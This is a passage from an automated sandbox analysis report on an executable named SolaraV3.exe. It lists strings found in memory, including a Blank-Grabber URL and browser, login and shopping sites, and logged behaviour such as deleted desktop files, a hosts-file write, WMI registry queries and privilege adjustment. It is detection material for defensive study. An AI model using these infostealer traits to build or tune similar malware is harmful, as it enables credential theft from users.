              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/bl
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: SolaraV3.exe, 00000002.00000002.2043602926.000001FC25980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: SolaraV3.exe, 00000002.00000002.2039868154.000001FC25370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F55000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695276473.000001FC24F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: SolaraV3.exe, 00000002.00000002.2043602926.000001FC25980000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
              Source: SolaraV3.exe, 00000002.00000003.1728427931.000001FC25337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1742788429.000001FC2530F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25358000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708000191.000001FC25358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
              Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC%
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B08000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SolaraV3.exe, 00000002.00000002.2042112590.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25337000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1706894370.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1697571219.000001FC25368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp, SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.1.dr, libcrypto-1_1.dll.1.drString found in binary or memory: https://www.openssl.org/H
              Source: SolaraV3.exe, 00000001.00000003.1560780982.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.drString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\SolaraV3.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LSBIHQFDVT.pdfJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\PALRGUCVEH.mp3Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZQIXMVQGAH.xlsxJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\QNCYCDFIJJ.xlsxJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NEBFQQYWPS.docxJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: conhost.exeProcess created: 40
              Source: cmd.exeProcess created: 68

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE93A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF74EE93A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,110_2_00007FF74EEBB57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7010001_2_00007FF6DC701000
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7208C81_2_00007FF6DC7208C8
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7089E01_2_00007FF6DC7089E0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7269641_2_00007FF6DC726964
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC711D541_2_00007FF6DC711D54
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC71E5701_2_00007FF6DC71E570
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7135A01_2_00007FF6DC7135A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC71DEF01_2_00007FF6DC71DEF0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7297281_2_00007FF6DC729728
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC725E7C1_2_00007FF6DC725E7C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC719EA01_2_00007FF6DC719EA0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7098001_2_00007FF6DC709800
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7117401_2_00007FF6DC711740
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC711F601_2_00007FF6DC711F60
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7187941_2_00007FF6DC718794
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7180E41_2_00007FF6DC7180E4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7218741_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7240AC1_2_00007FF6DC7240AC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7119441_2_00007FF6DC711944
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7121641_2_00007FF6DC712164
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7139A41_2_00007FF6DC7139A4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70A2DB1_2_00007FF6DC70A2DB
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC71DA5C1_2_00007FF6DC71DA5C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC725C001_2_00007FF6DC725C00
